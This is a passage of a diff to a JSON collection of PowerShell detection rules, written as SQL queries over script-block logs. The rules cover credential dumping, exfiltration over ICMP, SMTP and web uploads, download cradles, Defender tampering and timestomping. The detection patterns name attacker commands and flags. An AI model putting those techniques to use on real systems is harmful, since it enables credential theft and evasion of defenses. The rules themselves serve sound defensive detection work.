Directories", + "id": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", "status": "experimental", - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", - "author": "frack113, MatilJ", + "description": "Detects powershell scripts that import modules from suspicious directories", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%MsXml2.%' ESCAPE '\\' AND ScriptBlockText LIKE '%XmlHttp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo 
\"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_msxml_com.yml" + "filename": "posh_ps_import_module_susp_dirs.yml" }, { - "title": "Powershell Local Email Collection", - "id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "title": "Suspicious PowerShell Invocations - Generic", + "id": "ed965133-513f-41d9-a441-e38076a0798f", "status": "test", - "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", - "author": "frack113", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1114.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Inbox.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook.olDefaultFolders%' ESCAPE '\\' OR ScriptBlockText LIKE '%-comobject outlook.application%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText 
LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_mail_acces.yml" + "filename": "posh_ps_susp_invocation_generic.yml" }, { - "title": "Winlogon Helper DLL", - "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", + "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", "status": "experimental", - "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CurrentVersion\\\\Winlogon%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Set-ItemProperty%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Item%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "posh_ps_winlogon_helper_dll.yml" + "filename": "posh_ps_tamper_defender_remove_mppreference.yml" }, { - "title": "Potential Suspicious Windows Feature Enabled", - "id": "55c925c1-7195-426b-a136-a9396800e29b", + "title": "Windows PowerShell Upload Web Request", + "id": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", "status": "experimental", - "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.exfiltration", + "attack.t1020" ], "falsepositives": [ - "Legitimate usage of the features listed in the rule." 
+ "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%TelnetServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TFTP%' ESCAPE '\\' OR ScriptBlockText LIKE '%SMB1Protocol%' ESCAPE '\\' OR ScriptBlockText LIKE '%Client-ProjFS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\') AND ScriptBlockText LIKE '%-Method %' ESCAPE '\\' AND (ScriptBlockText LIKE '% Put %' ESCAPE '\\' OR ScriptBlockText LIKE '% Post %' ESCAPE '\\'))" ], - "filename": "posh_ps_enable_susp_windows_optional_feature.yml" + "filename": "posh_ps_upload.yml" }, { - "title": "PowerShell Get-Process LSASS in ScriptBlock", - "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "title": "WMImplant Hack Tool", + "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", "status": "test", - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects parameters used by WMImplant", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1047", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Administrative scripts that use the same 
keywords." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_getprocess_lsass.yml" + "filename": "posh_ps_wmimplant.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", - "id": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", - "status": "experimental", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "title": "Execution via CL_Mutexverifiers.ps1", + "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "status": "test", + "description": "Detects Execution via runAfterCancelProcess in 
CL_Mutexverifiers.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Compress-Archive %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DestinationPath %' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_zip_compress.yml" + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" }, { - "title": "Potential Data Exfiltration Via Audio File", - "id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", - "status": "experimental", - "description": "Detects potential exfiltration attempt via audio file using PowerShell", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Dump Credentials from Windows Credential Manager With PowerShell", + "id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", + "status": "test", + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE 
'%[System.Math]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%[IO.FileMode]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%BinaryWriter%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x52%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x49%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x46%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x57%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x41%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x56%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x45%' ESCAPE '\\' AND ScriptBlockText LIKE '%0xAC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-PasswordVaultCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CredManCreds%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Windows.Security.Credentials.PasswordVault%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.CSharp.CSharpCodeProvider%' ESCAPE '\\' AND ScriptBlockText LIKE '%[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())%' ESCAPE '\\' AND ScriptBlockText LIKE '%Collections.ArrayList%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.CodeDom.Compiler.CompilerParameters%' ESCAPE '\\')))" ], - "filename": "posh_ps_audio_exfiltration.yml" + "filename": "posh_ps_dump_password_windows_credential_manager.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Powershell", - "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "PowerShell ICMP Exfiltration", + "id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", + "status": "test", + "description": "Detects Exfiltration Over Alternative Protocol - ICMP. 
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Unknown" + "Legitimate usage of System.Net.NetworkInformation.Ping class" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.NetworkInformation.Ping%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Send(%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" + "filename": "posh_ps_icmp_exfiltration.yml" }, { "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", 
@@ -7046,185 +6954,205 @@ "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Powershell", - "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", + "id": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Compress-Archive %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DestinationPath %' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" + "filename": "posh_ps_susp_zip_compress.yml" }, { - "title": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", - "id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", + "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript", + "id": "975b2262-9a49-439d-92a6-0709cccdf0b2", "status": "experimental", - "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. 
This technique is often used as a method to load malicious content into memory afterward.", - "author": "frack113", + "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.defense_evasion" + ], "falsepositives": [ - "Legitimate administrative script" + "Installation of unsigned packages for testing purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%FromBase64String%' ESCAPE '\\' AND ScriptBlockText LIKE '%MemoryStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%H4sI%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AppPackage %' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-AppxPackage %' ESCAPE '\\') AND ScriptBlockText LIKE '% -AllowUnsigned%' ESCAPE '\\')" ], - "filename": "posh_ps_frombase64string_archive.yml" + "filename": "posh_ps_install_unsigned_appx_packages.yml" }, { - "title": "Suspicious Get-ADReplAccount", - "id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", + "id": "1139d2e2-84b1-4226-b445-354492eba8ba", + "status": "experimental", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", + "author": "James Pemberton / @4A616D6573", + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "falsepositives": [ + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
+ ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\' OR ScriptBlockText LIKE '%wget %' ESCAPE '\\' OR ScriptBlockText LIKE '%curl %' ESCAPE '\\' OR ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR ScriptBlockText LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\') AND NOT (Path LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\'))" + ], + "filename": "posh_ps_web_request_cmd_and_cmdlets.yml" + }, + { + "title": "Powershell Timestomp", + "id": "c6438007-e081-42ce-9483-b067fbef33c3", "status": "test", - "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.defense_evasion", + "attack.t1070.006" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%Get-ADReplAccount%' ESCAPE '\\' AND ScriptBlockText LIKE '%-All %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Server %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.CreationTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastWriteTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastAccessTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetCreationTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastAccessTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastWriteTime%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_adreplaccount.yml" + "filename": "posh_ps_timestomp.yml" }, { - "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", - "id": "db885529-903f-4c5d-9864-28fe199e6370", + "title": "Windows Screen Capture with CopyFromScreen", + "id": "d4a11f63-2390-411c-9adf-d791fd152830", "status": "experimental", - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.collection", + "attack.t1113" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADComputer %' ESCAPE '\\' AND 
ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%.CopyFromScreen%' ESCAPE '\\')" ], - "filename": "posh_ps_computer_discovery_get_adcomputer.yml" + "filename": "posh_ps_capture_screenshots.yml" }, { - "title": "Powershell Exfiltration Over SMTP", - "id": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", + "title": "Tamper Windows Defender - PSClassic", + "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "status": "experimental", - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. 
Or set default actions to allow.", "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Send-MailMessage%' ESCAPE '\\' AND NOT (ScriptBlockText LIKE '%CmdletsToExport%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE 
'%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_send_mailmessage.yml" + "filename": "posh_pc_tamper_with_windows_defender.yml" }, { - "title": "Suspicious PowerShell Download - Powershell Script", - "id": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", - "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", + "id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "status": "test", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.DownloadFile(%' ESCAPE '\\' OR ScriptBlockText LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE 
